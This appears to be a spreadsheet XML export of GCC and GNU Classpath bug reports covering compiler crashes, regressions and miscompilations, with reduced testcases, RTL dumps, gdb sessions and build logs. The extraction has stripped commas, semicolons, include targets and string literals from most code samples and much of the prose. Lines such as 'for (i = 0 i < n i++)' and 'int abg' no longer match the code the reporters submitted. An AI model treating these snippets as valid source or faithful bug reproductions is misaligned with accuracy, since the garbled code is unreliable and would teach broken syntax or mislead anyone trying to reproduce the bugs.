(This GCC was obtained using apt)
* the complete command line that triggers the bug
gcc -msse2 -O3 -ffast-math -m32 test.c
* the compiler output (error messages warnings etc.) and
The compiler produces no warnings with -Wextra. When I tried to use the undefined behavior sanitizer (-fsanitize=undefined) the crash vanishes.
* the preprocessed file (*.i*) that triggers the bug generated by adding -save-temps to the complete compilation command or in the case of a bug report for the GNAT front end a complete set of source files (see below).
This file is attached and is identical to the .c file which generated it (minus the hash-prefixed lines at the top).</t>
  </si>
  <si>
    <t>gcc_bugzilla</t>
  </si>
  <si>
    <t>GCC-48633</t>
  </si>
  <si>
    <t>[4.7 regression] IRA causes ICE in compensate_edge</t>
  </si>
  <si>
    <t>Since r172516 the Ada testcase cxg2001 fails with an ICE in compensate_edge
on x86_64-linux.
The problem is not specific to Ada an can be reproduced with a C++ testcase
simulating what Ada does.  This testcase does not need the patch from r172516 and also fails before:
% cat ira-bug.cc
/* { dg-do compile} */
/* { dg-options -O2 -fira-region=all -fnon-call-exceptions } */
extern long double getme (void)
extern void useme (long double)
struct Frame {
    long double tmp
}
void bugme (int n)
{
  Frame f
  int i
  f.tmp = getme()
  try {
    for (i = 0 i &lt; n i++)
      {
        f.tmp += 1.0
      }
  } catch (...) {
    f.tmp += 1.0
  }
  useme (f.tmp)
}
% ./cc1plus -O2 -fnon-call-exceptions -fira-region=all ira-bug.cc
ira-bug.cc: In function â€˜void bugme(int)â€™:
ira-bug.cc:22:1: internal compiler error: in compensate_edge at reg-stack.c:2781
-fnon-call-exceptions is needed as Ada effectively sets it -fira-region=all
is needed to make IRA fail on this small testcase otherwise IRA assigned
registers for the subloops here due to low reg pressure.  The Ada testcase
has much higher pressure causing IRA to go into the same code-paths as
with ira-region=all.
The problem is the allocation of pseudo 61 to hardreg 10 (a stackreg).
pseudo 61 gets two allocnos a1 for loop0 which conflicts with the stackregs
because it's live over abnormal edges and a8 for loop1 which doesn't
conflict with those stackregs (which is okay).
The problem is the transition from loop1 (a8 alloced to hardreg 10) to loop0
(a1 spilled) which requires a memory store from h10 to stack.  But the
transition itself goes over an EH edge and the compensation code is inserted
into the EH block:
(code_label/s 65 36 67 11 8  [1 uses])
(note 67 65 84 11 [bb 11] NOTE_INSN_BASIC_BLOCK)
(insn 84 67 40 11 (set (mem/c:XF (plus:DI (reg/f:DI 7 sp)
                (const_int 32 [0x20])) [4 %sfp+-16 S16 A128])
        (reg:XF 10 st(2) [orig:61 f$tmp ] [61])) 105 {*movxf_internal}
     (nil))
This is the compensation code requiring hardreg 10 to be set but this
bb 11 is the target of an EH edge.  This then later is checked in the
reg-stack pass and asserts.
The IRA dump is somewhat interesting:
  Loop 0 (parent -1 header bb0 depth 0)
    bbs: 12 11 10 9 8 7 3(-&gt;5:l1) 2
    all: 0r62 1r61 2r73 3r70 4r69 5r74 6r63 7r66
    modified regnos: 61 62 63 66 69 70 73 74
    border:
    Pressure: GENERAL_REGS=2 FLOAT_REGS=4
    Hard reg set forest:
      0:( 0-6 8-15 21-51)@0
        1:( 0-6 37-44)@24004
          2:( 0 3 5 6 41-44)@14
        3:( 8-15)@60040
      Spill a1(r61l0)
So for loop0 r61 is spilled fine.
  Loop 1 (parent 0 header bb5 depth 1)
    bbs: 6(-&gt;7:l0) 5(-&gt;11:l0) 4
So we have two exits from this region via 6-&gt;7 (the normal loop exit)
and via 5-&gt;11 (the EH edge).
    all: 8r61 9r63 10r66 11r73 12r74 13r62
    modified regnos: 61 62 63
    border: 8r61 9r63 10r66 11r73 12r74 13r62
    Pressure: GENERAL_REGS=2 FLOAT_REGS=4
    Hard reg set forest:
      0:( 0-6 8-15 21-51)@0
        1:( 0-6 37-44)@22920
        2:( 8 10-15)@72856
      Allocno a8r61 of FLOAT_REGS(8) has 7 avail. regs 8 10-15
      ...
      Popping a8(r61l1)  -- assign reg 10
So r61 in the loop gets hardreg 10.  Then we go on:
New iteration of spill/restore move
      Changing RTL for loop 1 (header bb5)
  10 vs parent -1:      Creating newreg=75 from oldreg=61
So it noticed that the two regions have different dispositions for the
same pseudo and generates compensation code:
rescanning insn with uid = 18.
deleting insn with uid = 18.
rescanning insn with uid = 7.
deleting insn with uid = 7.
scanning new insn with uid = 84.
insn 84 is the compensation code and it's placed in a region where the source
(a8 == hardreg 10) isn't live anymore.</t>
  </si>
  <si>
    <t>GCC-49189</t>
  </si>
  <si>
    <t>[4.7 regression] infinite recursion in constant folder</t>
  </si>
  <si>
    <t>The patch
2011-05-26  Richard Guenther  
	* fold-const.c (fold_unary_loc): Remove bogus code.
has introduced an infinite recursion in the constant folder for the Ada testcase about to be attached.  No change after the fix for PR middle-end/49177.</t>
  </si>
  <si>
    <t>GCC-21879</t>
  </si>
  <si>
    <t>Memory management problem</t>
  </si>
  <si>
    <t>Symptoms are:
FAIL: gcc.dg/cpp/direct2.c (test for excess errors)
FAIL: gcc.dg/cpp/direct2s.c (test for excess errors)
on sparc64-solaris2.* (not visible on sparc-solaris2.* with -m64).
Parser obstack memory is wrongly reused leading to memory corruption. 
Reproducible on x86_64-suse-linux:
c-decl.c:start_function
  nstack_vm = XOBNEW (
  nstack_vm-&gt;labels_def = NULL
  nstack_vm-&gt;labels_used = NULL
  nstack_vm-&gt;scope = 0
  nstack_vm-&gt;next = label_context_stack_vm
  label_context_stack_vm = nstack_vm
On second stop we have:
(gdb) p label_context_stack_vm
$9 = (struct c_label_context_vm *) 0x1375008
(gdb) p *label_context_stack_vm
$10 = {labels_def = 0x0 labels_used = 0x0 scope = 0 next = 0x1375008}
On SPARC 64-bit the labels_used and scope fields are later corrupted in
build_function_declarator:
  struct c_declarator *ret = XOBNEW (
  ret-&gt;kind = cdk_function
  ret-&gt;declarator = target
  ret-&gt;u.arg_info = args
Parser obstack memory is wrongly freed in c_parser_translation_unit but I don't
know enough of the new C parser to debug it myself.</t>
  </si>
  <si>
    <t>GCC-10525</t>
  </si>
  <si>
    <t>Re: [3.3 regression] 20020227-1.c:30: interna compiler error: in</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt; Hi Honza
 &gt; 
 &gt; Having trouble both with your email jh@suse.cz and gcc-gnats@gcc.gnu.org.
 &gt; 
 &gt; The testcase can be simplified to:
 &gt; 
 &gt; typedef __complex__ float cf
 &gt; struct x { cf f } __attribute__ ((__packed__))
 &gt; void
 &gt; f2 (struct x *y)
 &gt; {
 &gt;   if (y-&gt;f)
 &gt;     abort ()
 &gt; }
 &gt; 
 &gt; Before reload we have
 &gt; 
 &gt; (insn 40 39 41 0 0000000000000000 (set (reg:SF 68)
 &gt;         (subreg:SF (reg:DI 99) 0)) 121 {*pa.md:3418} (insn_list 39 (nil))
 &gt;     (nil))
 This is what worries me.  The subreg is already not representable on
 reg:DI because the whole value is single register right?
 I believe that before my change reload just misscompiled this piece of
 code by simplifuing it into (reg:SF 99).  Now it appears to notice the
 problem (that was motivation of my patch) and produce reload around.
 It does not know how to deal with such a problem so it ends up in
 another wrong subreg getting into infinite loop.
 &gt; 
 &gt; I'm not sure that subregs for insns 40 and 41 before reload are invalid.
 &gt; I quick hack to try use a pair of general registers for TCmode didn't
 &gt; seem to change the situation.  So I don't know how to fix the problem.
 &gt; The code generated before for this testcase (PR6221) was wrong on
 &gt; all 64-bit targets except apparently powerpc64.
 Good to hear that there really was misscompilation before at least we
 don't have regression :=).
 It works for x86-64 apparently.  Didn't investigated on why.
 &gt; 
 &gt; Isn't the obvious fix to store reg:DI 99 to memory and adjust the memory
 &gt; address used in the SFmode loads in insns 67 and 69 so that they access
 &gt; the correct portion of what was in reg 99?
 Yes this is what probably should happen.  Other way around is to avoid
 such a subregs from being produced at first place (reload currently can
 deal with cases where the generic registers can represent the subreg
 only fails in the cases where subreg is never representable).  Using
 subreg for something that really isn't subreg is just sick.
 I am not sure how to implement any of these two possibilities. In the
 reload case I don't think there is direct way to instruct reload to
 offload something into memory but I may be wrong.  I will unlikely be
 able to dig into this before end of the week so in the case you (or
 someone else) beat me I would be happy :)
 Honza
 &gt; 
 &gt; Dave
 &gt; -- 
 &gt; J. David Anglin                                  dave.anglin@nrc-cnrc.gc.ca
 &gt; National Research Council of Canada              (613) 990-0752 (FAX: 952-6602)
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-28546</t>
  </si>
  <si>
    <t>[4.2 Regression] ./java/lang/Thread.h:31: error: using typedef-name '_Jv_Thread_t' after 'class'</t>
  </si>
  <si>
    <t>/xxx/gnu/gcc/objdir/./gcc/xgcc -shared-libgcc -B/xxx/gnu/gcc/objdir/./gcc -nostd
inc++ -L/xxx/gnu/gcc/objdir/hppa2.0w-hp-hpux11.00/libstdc++-v3/src -L/xxx/gnu/gc
c/objdir/hppa2.0w-hp-hpux11.00/libstdc++-v3/src/.libs -B/opt/gnu/gcc/gcc-4.2.0/h
ppa2.0w-hp-hpux11.00/bin/ -B/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.00/lib/ -i
system /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.00/include -isystem /opt/gnu/gc
c/gcc-4.2.0/hppa2.0w-hp-hpux11.00/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc
/libjava -I./include -I./gcj -I../../../gcc/libjava -Iinclude -I../../../gcc/lib
java/include -I../../../gcc/libjava/classpath/include -Iclasspath/include -I../.
./../gcc/libjava/classpath/native/fdlibm -I../../../gcc/libjava/../boehm-gc/incl
ude -I../boehm-gc/include -I../../../gcc/libjava/libltdl -I../../../gcc/libjava/
libltdl -I../../../gcc/libjava/.././libjava/../gcc -I../../../gcc/libjava/../zli
b -I../../../gcc/libjava/../libffi/include -I../libffi/include -fno-rtti -fnon-c
all-exceptions -fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -We
xtra -Wall -D_GNU_SOURCE -DPREFIX=\/opt/gnu/gcc/gcc-4.2.0\ -DLIBDIR=\/opt/gnu
/gcc/gcc-4.2.0/lib\ -DJAVA_HOME=\/opt/gnu/gcc/gcc-4.2.0\ -DBOOT_CLASS_PATH=\
/opt/gnu/gcc/gcc-4.2.0/share/java/libgcj-4.2.0.jar\ -DJAVA_EXT_DIRS=\/opt/gnu/
gcc/gcc-4.2.0/share/java/ext\ -DGCJ_ENDORSED_DIRS=\/opt/gnu/gcc/gcc-4.2.0/shar
e/java/gcj-endorsed\ -DGCJ_VERSIONED_LIBDIR=\/opt/gnu/gcc/gcc-4.2.0/lib/gcj-4.
2.0\ -DPATH_SEPARATOR=\:\ -DLIBGCJ_DEFAULT_DATABASE=\/opt/gnu/gcc/gcc-4.2.0/
lib/gcj-4.2.0/classmap.db\ -DLIBGCJ_DEFAULT_DATABASE_PATH_TAIL=\gcj-4.2.0/clas
smap.db\ -DTOOLEXECLIBDIR=\/opt/gnu/gcc/gcc-4.2.0/lib\ -g -O2 -MT prims.lo -M
D -MP -MF .deps/prims.Tpo -c ../../../gcc/libjava/prims.cc  -fPIC -DPIC -o .libs
/prims.o
./java/lang/Thread.h:31: error: using typedef-name '_Jv_Thread_t' after 'class'
./include/java-threads.h:28: error: '_Jv_Thread_t' has a previous declaration he
re
make[3]: *** [prims.lo] Error 1
Thread.h:
...
class _Jv_JNIEnv
class _Jv_Thread_t
#define _JV_NOT_OWNER 1
...
java-threads.h:
...
typedef int _Jv_Mutex_t
typedef int _Jv_Thread_t
typedef void _Jv_ThreadStartFunc (java::lang::Thread *)
...</t>
  </si>
  <si>
    <t>GCC-10838</t>
  </si>
  <si>
    <t>GCC 3.3 [libjava]: java.io.ObjectInputStream syntax error</t>
  </si>
  <si>
    <t>GCC 3.3: java.io.ObjectInputStream of libjava uses an incorrect java.io.SerializablePermission (enableSubtitution instead of enableSubstitution).
Release:
unknown
Environment:
java</t>
  </si>
  <si>
    <t>ycswyw</t>
  </si>
  <si>
    <t>GCC-5197</t>
  </si>
  <si>
    <t>compiler doesn't work correctly</t>
  </si>
  <si>
    <t>Cannot solve the overloaded member function.
Release:
g++ 3.0
Environment:
RedHat Linux 7.0
How-To-Repeat:
Compile this program will give you the error message.
This file can be compile and linked on RedHat Linux 6.?
which have the old version of g++.
The file:
#include 
class Param
{
public:
   Param( int v) { value = v  } 
   int value 
}
class Test
{
public:
    static int myFunc( const Param }
    static int myFunc( const int }
} 
static  int sfunc( int(*f)(const Param&amp; k) const Param &amp;t )
{
    return (*f)( t) 
}
int
main()
{
    int ret 
    Param param(11) 
    ret = sfunc( Test::myFunc Param(12)) 
    cout &lt;&lt; ret= &lt;&lt; ret &lt;&lt; endl 
    return 0 
}</t>
  </si>
  <si>
    <t>GCC-47008</t>
  </si>
  <si>
    <t>[4.6 Regression] gfortran.dg/extends_{23}.f03 FAIL with -Os -fschedule-insns</t>
  </si>
  <si>
    <t>Created attachment 22814
reduced testcase
Output:
$ gfortran -Os -fno-asynchronous-unwind-tables -fno-inline-functions-called-once -fschedule-insns testcase.f03
$ ./a.out 
Aborted
$ gfortran -Os -fno-asynchronous-unwind-tables -fno-inline-functions-called-once -fschedule-insns extends_2.f03
$ ./a.out 
Aborted
$ gfortran -Os -fno-asynchronous-unwind-tables -fno-inline-functions-called-once -fschedule-insns -fsched-pressure extends_3.f03
$ ./a.out 
Aborted
For testcase.f03 in the assembly the problem is there:
# store 123455 to [rsp+8] &amp;supervisor == rsp+8
mov	DWORD PTR [rsp+8] 123455	# person.1.ss
lea	rsi [rsp+8]	# tmp64
# rsp -= 8 (parameter for entry() ?)
push	0	#
# &amp;supervisor == rsp+8+8 == rsp+16
mov	eax 538976288	# tmp67
# loads old value of &amp;supervisor(+4)
lea	rdx [rsp+12]	# tmp65
lea	rbx [rsp+56]	# tmp72
mov	rdi rdx	# tmp66 tmp65
mov	edx OFFSET FLAT:.LC3	#
# starts storing 4 bytes under previously used &amp;supervisor overwrites 123455
rep stosd
Tested revisions (for reduced testcase):
r168026 - fail
r165699 - OK
4.5 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-20412</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] RTL checking failure in the combiner</t>
  </si>
  <si>
    <t>/*
gcc-4.0 sparc-SunOS bug
gcc-4.0 -O0 -c foo.c // ok
gcc-4.0 -O1 -c foo.c // ICE
% gcc-4.0 -v
Using built-in specs.
Target: sparc-sun-solaris2.8
Configured with: /home/kate/gcc-4.0-20050305/src/gcc-4.0-20050305/configure
--enable-languages=c --prefix=/home/kate/gcc-4.0-20050305/sparc-SunOS
Thread model: posix
gcc version 4.0.0 20050305 (prerelease)
% 
*/
#define FALSE   0
int
foo()
{
  int      abg
  int      ilen
  int      stop
  len = 10
  stop = FALSE
  for (i=0 i&lt;len i++)
  {
    a = bar1() ? 0 : 1
    b = bar2() ? 0 : 1
    g = bar3() ? 0 : 1
    if (stop = ((a+b) % 2 != g)) break
  }
  return stop
}</t>
  </si>
  <si>
    <t>GCC-44805</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.c-torture/execute/builtins/strpcpy-2.c execution at -O1 and above</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/strpcpy-2.c /test/gn
u/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/strpcpy-2-lib.c /test/gnu
/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/lib/main.c  -w  -O1   -lm 
  -o /test/gnu/gcc/objdir/gcc/testsuite/gcc/strpcpy-2.x1    (timeout = 300)
PASS: gcc.c-torture/execute/builtins/strpcpy-2.c compilation  -O1 
Setting LD_LIBRARY_PATH to :/test/gnu/gcc/objdir/gcc::/test/gnu/gcc/objdir/gcc
FAIL: gcc.c-torture/execute/builtins/strpcpy-2.c execution  -O1 
Program received signal SIGBUS Bus error.
0x4000000000002cb4 in test (buf3= 
    buf4= buf6= 
    n=)
    at /test/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/strpcpy-2.c:28
28        if (__builtin_stpcpy ((char *) buf3 ABCDEFG) != (char *) buf1 + 7
(gdb) p/x $pc
$1 = 0x4000000000002cb4
(gdb) disass 0x4000000000002ca4 0x4000000000002cc4
Dump of assembler code from 0x4000000000002ca4 to 0x4000000000002cc4:
0x4000000000002ca4 :  addil L%0dpr1
0x4000000000002ca8 :  ldd 8(r1)r26
0x4000000000002cac :  addil L%0dpr1
0x4000000000002cb0 :  ldd 10(r1)ret0
0x4000000000002cb4 :  ldd 0(ret0)ret0
0x4000000000002cb8 :  std ret00(r26)
0x4000000000002cbc :  addil L%0dpr1
0x4000000000002cc0 :  ldd 18(r1)r25
End of assembler dump.
(gdb) p/x $ret0
$2 = 0x40000000000017ac
(gdb) x/8c 0x40000000000017ac
0x40000000000017ac :   65 'A'  66 'B'  67 'C'  68 'D'  69 'E'  70 'F' 7
ABCDEFG is misaligned.  At first glance this appears to be a problem
with the alignment of the .rodata section.</t>
  </si>
  <si>
    <t>GCC-69015</t>
  </si>
  <si>
    <t>ICE: RTL check: expected code 'code_label' have 'return' in find_cond_trap at ifcvt.c:3715 with -fno-if-conversion and __builtin_trap()</t>
  </si>
  <si>
    <t>Created attachment 37109
reduced testcase
Compiler output:
$ powerpc-unknown-linux-gnu-gcc -O -fno-if-conversion testcase.c 
testcase.c: In function 'foo':
testcase.c:6:1: internal compiler error: RTL check: expected code 'code_label' have 'return' in find_cond_trap at ifcvt.c:4576
 }
 ^
0xab3ac7 rtl_check_failed_code1(rtx_def const* rtx_code char const* int char const*)
        /repo/gcc-trunk/gcc/rtl.c:811
0x11bc76b find_cond_trap
        /repo/gcc-trunk/gcc/ifcvt.c:4576
0x11bc76b find_if_header
        /repo/gcc-trunk/gcc/ifcvt.c:4165
0x11bc76b if_convert
        /repo/gcc-trunk/gcc/ifcvt.c:5302
0x11bcb4d execute
        /repo/gcc-trunk/gcc/ifcvt.c:5492
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ powerpc-unknown-linux-gnu-gcc -v                               
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-powerpc/bin/powerpc-unknown-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-231884-checking-yes-rtl-df-nographite-powerpc/bin/../libexec/gcc/powerpc-unknown-linux-gnu/6.0.0/lto-wrapper
Target: powerpc-unknown-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=powerpc-unknown-linux-gnu --with-ld=/usr/bin/powerpc-unknown-linux-gnu-ld --with-as=/usr/bin/powerpc-unknown-linux-gnu-as --with-sysroot=/usr/powerpc-unknown-linux-gnu --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-231884-checking-yes-rtl-df-nographite-powerpc
Thread model: posix
gcc version 6.0.0 20151221 (experimental) (GCC) 
Only powerpc[64] target has problems with this testcase.
Tested revisions:
r231884 - FAIL
5-branch r231870 - FAIL
4_9-branch r231865 - FAIL
4_8-branch r224828 - FAIL</t>
  </si>
  <si>
    <t>GCC-1140</t>
  </si>
  <si>
    <t>final field initialized with cast expression not treated as constant</t>
  </si>
  <si>
    <t xml:space="preserve">From: Pekka Nikander 
To: java-gnats@sourceware.cygnus.com apbianco@cygnus.com gcb@gnu.org
Cc:  
Subject: Re: gcj/131
Date: Thu 23 Mar 2000 13:14:48 +0200
 http://sourceware.cygnus.com/cgi-bin/gnatsweb.pl?cmd=view&amp;pr=131&amp;database=java
 I think this bug is related to a subtle code generator bug.
 If you define a static final field that doesn't use casts
 the compiler generates a compile time constant.  However
 if you add a cast to the definition without any other
 changes the compiler does not any more recognize the 
 initializer as a constant but produces code into .
 Test code:
   package main
   class dummy {
      static final byte b0 = 0
      static final byte b1 = (byte)0
   }
 Resulting assembler code (for Hitachi H8/300):
 	.section .text
 	.align 1
 	.global __003cclinit_003e__Q24main5dummyU
 __003cclinit_003e__Q24main5dummyU:
 	mov.w	#__CL_Q24main5dummyr6
 	jsr	@_initClass__Q34java4lang5Class
 	sub.b	r0lr0l
 	mov.b	r0l@__Q24main5dummy$b1
 	rts
 	.global __Q24main5dummy$b0
 	.section .data
 __Q24main5dummy$b0:
 	.byte 0
 	.global __Q24main5dummy$b1
 	.section .bss
 __Q24main5dummy$b1:
 	.space 2
 The bug seems to be in parse.y around line 14300 (YMMV I have a custom version)
   if (TREE_TYPE (node) != NULL_TREE &amp;&amp; code != VAR_DECL &amp;&amp; code != FIELD_DECL)
     return NULL_TREE
 Integer constants etc are handled before CONVERT_EXPR (which does have
 a TREE_TYPE defined) trips on this e.g. PLUS_EXPR doesn't have a type
 defined and it passes.
 Maybe this whole test is more or less bogus?
 --Pekka Nikander
</t>
  </si>
  <si>
    <t>gcb</t>
  </si>
  <si>
    <t>GCC-31769</t>
  </si>
  <si>
    <t>ICE with OpenMP and exceptions</t>
  </si>
  <si>
    <t>Hi
The following small program gives ICE when compiled like this:
g++ -Wall -fopenmp -O2 -I$POLDEST/ext/include -E -o./test_pp.cc ./test.cc
g++ -Wall -fopenmp -O2 -L$POLDEST/ext/lib -o./test ./test_pp.cc -lblitz -lgomp
./test.cc: In function â€˜int main()â€™:
./test.cc:3: internal compiler error: Segmentation fault
When removing the 'try-catch'-part it works fine.
----
#include 
int main()
{
  try
  {
    blitz::Array transOrig( 10)
    blitz::Array trans( 10)
    blitz::Range myRange( 0 9)
#pragma omp parallel for
    for( int i = 0 i &lt; 2 ++i)
    {
      trans += transOrig( myRange)
    }
  }
  catch( std::exception)
  {}
}
Here the preprocessed source: http://data.marssoft.de/attachment-bug-gcc.bz2
And my specs: ~&gt; gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: [...]/gcc-4.2-branch/configure -v --enable-languages=cc++f95 --prefix=[...]/extgcc-x86_64_gcc4-r124295 --enable-shared --with-system-zlib --without-included-gettext --enable-threads=posix --enable-nls --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-debug --enable-gtk-cairo --with-mpfr=[...]/extgcc-x86_64_gcc4-r124295 --with-gmp=[...]/extgcc-x86_64_gcc4-r124295 --disable-werror --enable-checking=release --disable-multilib --enable-bootstrap
Thread model: posix
gcc version 4.2.0 20070430 (prerelease)</t>
  </si>
  <si>
    <t>supermar</t>
  </si>
  <si>
    <t>GCC-33617</t>
  </si>
  <si>
    <t>ICE for nonconstant callee-copied constructor arguments</t>
  </si>
  <si>
    <t>The following code:
---------------------------------------------------------------------------
typedef float V8SF __attribute__ ((vector_size (32)))
void test0 (V8SF)
void
foo (float x)
{
  test ((V8SF) { x x x x x x x x })
}
---------------------------------------------------------------------------
causes an ICE on targets for which the vector argument is callee-copied:
---------------------------------------------------------------------------
/tmp/foo.c: In function 'foo':
/tmp/foo.c:6: internal compiler error: in copy_constant at varasm.c:3067
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
---------------------------------------------------------------------------
We try to take the address of the original CONSTRUCTOR (rather than
a temporary as in the caller-copied case) and expand_expr_addr_expr_1
assumes that all constructors are constant.</t>
  </si>
  <si>
    <t>CLASSPATH-22708</t>
  </si>
  <si>
    <t>java.awt.geom.QuadCurve2D.solveQuadratic sometimes gives wrong result</t>
  </si>
  <si>
    <t>The solveQuadratic method in java.awt.geom.QuadCurve2D gives the wrong result for the equation 4 * (x^2) = 0. This equation has exactly one solution namely x = 0.
Both Sun J2SE 1.4.1_01 (GNU/Linux i386) and Apple JDK 1.3.1 (PowerPC G4) return the correct result. GNU Classpath however claims that the equation has two solutions.
A Mauve test case is attached see checks 8 and 9.</t>
  </si>
  <si>
    <t>GCC-67076</t>
  </si>
  <si>
    <t>[6/7/8 Regression] [F08] Critical inside a module procedure</t>
  </si>
  <si>
    <t>With OpenCoarrays (1.0.0) and MPICH (3.1.3) I get
  [raul@x220 tests]$ cat Critical.f90
  module m
  contains
    subroutine f()
      critical
      end critical
    end subroutine f
  end module m
  end program
  [raul@x220 tests]$ mpif90 -fcoarray=lib Critical.f90 libcaf_mpi.a 
  f951: internal compiler error: in gfc_enforce_clean_symbol_state at
  fortran/symbol.c:3749
  Please submit a full bug report
  with preprocessed source if appropriate.
  See  for instructions.
The build is successful only with -fcoarray=single.</t>
  </si>
  <si>
    <t>raullaasner</t>
  </si>
  <si>
    <t>GCC-46171</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: in gen_rtx_SUBREG at emit-rtl.c:774 with -fno-tree-dce -g</t>
  </si>
  <si>
    <t>Created attachment 22151
reduced testcase
Compiler output:
$ gcc -O -fno-tree-dce -g pr46171.c 
pr46171.c: In function 'foo':
pr46171.c:8:1: internal compiler error: in gen_rtx_SUBREG at emit-rtl.c:774
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165915 - crash
r165699 - crash
r163636 - OK
4.5 r165781 - OK</t>
  </si>
  <si>
    <t>CLASSPATH-23874</t>
  </si>
  <si>
    <t>implement window placement in the GTK peers</t>
  </si>
  <si>
    <t>Classpath misses proper implementations of GraphicsDevice GraphicsEnvironment
and GraphicsConfiguration.
The implementation is very important to place dialogs correctly. Eg. top-level
dialogs should be centered on the desktop. Furthermore it would allow us to make
the Swing demo application to look nicer (currently all small test windows are
created at 00 which is annoying).</t>
  </si>
  <si>
    <t>GCC-50008</t>
  </si>
  <si>
    <t>[4.8 Regression] type mismatch in array reference verify_gimple failed</t>
  </si>
  <si>
    <t>Created attachment 24936
Testcase</t>
  </si>
  <si>
    <t>GCC-18587</t>
  </si>
  <si>
    <t>[4.1 Regression] build_v_may_defs and build_vuses can be improved when adding</t>
  </si>
  <si>
    <t>For PR 15855 we see that the tree aliasing analysis is slow:
 tree alias analysis   :  24.22 ( 6%) usr   0.75 ( 2%) sys  26.57 ( 5%) wall
9% of the total time is spent looking at for if something is in either build_v_may_defs or build_vuses.</t>
  </si>
  <si>
    <t>GCC-31254</t>
  </si>
  <si>
    <t>[4.3 Regression] verify_ssa failed: type mismatch between an SSA_NAME and its symbol</t>
  </si>
  <si>
    <t>I just tried to compile recent Linux kernel 2.6.20.3
with GNU C compiler 4.3 snapshot 20070316.
The compiler said
fs/afs/inode.c: In function 'afs_inode_map_status':
fs/afs/inode.c:286: error: type mismatch between an SSA_NAME and its symbol
fs/afs/inode.c:286: error: in statement
vnode_2(D)-&gt;vfs_inode.i_mtime = inode_4-&gt;i_ctime
fs/afs/inode.c:286: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [fs/afs/inode.o] Error 1
make[1]: *** [fs/afs] Error 2
make: *** [fs] Error 2
Preprocessed source code attached. Flag -O2 required.</t>
  </si>
  <si>
    <t>GCC-5552</t>
  </si>
  <si>
    <t>jar fails to include class files in subdirectories</t>
  </si>
  <si>
    <t>This can be noticed for example while building the Qt Java bindings:
Using the command:
jar cvf qtjava.jar org/kde/qt/*.class
gcj's jar creates an empty manifest and packages it in an otherwise empty jar file.
I'd expect the class files to be included both in the jar file and the manifest the way the non-free JDKs do.
Release:
CVS HEAD 2002/01/30
Environment:
Red Hat Linux post-7.2
How-To-Repeat:
mkdir foo
mv foo.class foo
jar cvf foo.jar foo/*.class</t>
  </si>
  <si>
    <t>GCC-6243</t>
  </si>
  <si>
    <t>testsuite fails almost all tests due to no libintl in LD_LIBRARY_PATH during test.</t>
  </si>
  <si>
    <t>When the testsuite is run I get numerous failures after the first 2 tests.
Each and everyone fails due to loader being unable to mab libintl.so
a similar problem is aparent with boehm-gc - but changing 
the LD_LIBRARY_PATH variable in its makefile means it can
complete the test properly.  However I cant work out how I 
can possibly change the way the LD_LIBRARY_PATH is being
modified in the libstdc++-v3 testsuite.  i found ld_library_path
in one of the main .exp files but modifying that didnt 
solve the problem.
Release:
3.2-CVS
Environment:
alphaev56-dec-osf4.0d
How-To-Repeat:
simply run the testsuite? - maybe theres something odd with
my configuration... any additional information I can provide 
just ask.</t>
  </si>
  <si>
    <t>GCC-53262</t>
  </si>
  <si>
    <t>ICE compiling busybox 1.19.3 with gcc 4.7.0</t>
  </si>
  <si>
    <t>This code produces an internal compiler error with gcc 4.7.0.  Build it with this command: gcc -O2 -o a a.c.
This is gcc built from the original 4.7.0 source x86 32-bit.
**** a.c ******
typedef unsigned int size_t
enum { 
 _ISalnum = 1  
}
extern __const unsigned short int **__ctype_b_loc (void) __attribute__ ((__nothrow__)) __attribute__ ((__const))
void parse_config_file(char *map size_t len) {
  char *end_3 = map + len - 3
  char *end_7 = map + len - 7
  char *p = map
  char *q
  int off
  for ( p &lt;= end_3 p++) {
    if (!(((*__ctype_b_loc ())[(int) ((*p))] 
    if (p &lt; end_7 &amp;&amp; p[6] == '_') {
      if (!memcmp(p CONFIG 6)) goto conf7
    }
    continue
    conf7: off = 7
    for (q = p q &lt; end_3+3 q++) {}
    if (q != p) {
      use_config(p q-p)
    }
  }
}
***** end a.c ****
a.c: In function 'parse_config_file':
a.c:28:10: internal compiler error: Segmentation fault
Thank you.
Neil Cahill.</t>
  </si>
  <si>
    <t>ncahill_alt</t>
  </si>
  <si>
    <t>GCC-77795</t>
  </si>
  <si>
    <t>[6/7 Regression] ::gets declared in C++14 mode</t>
  </si>
  <si>
    <t>This is a valid C++14 program that is rejected since 6.1:
int gets
#include 
And this should not compile but is accepted since 6.1:
#include 
using ::gets
Since we switched the default to -std=gnu++14 the configure checks for ::gets find it is missing from glibc so we don't define _GLIBCXX_HAVE_GETS and then in  we do:
#ifndef _GLIBCXX_HAVE_GETS
extern C char* gets (char* __s) __attribute__((__deprecated__))
#endif
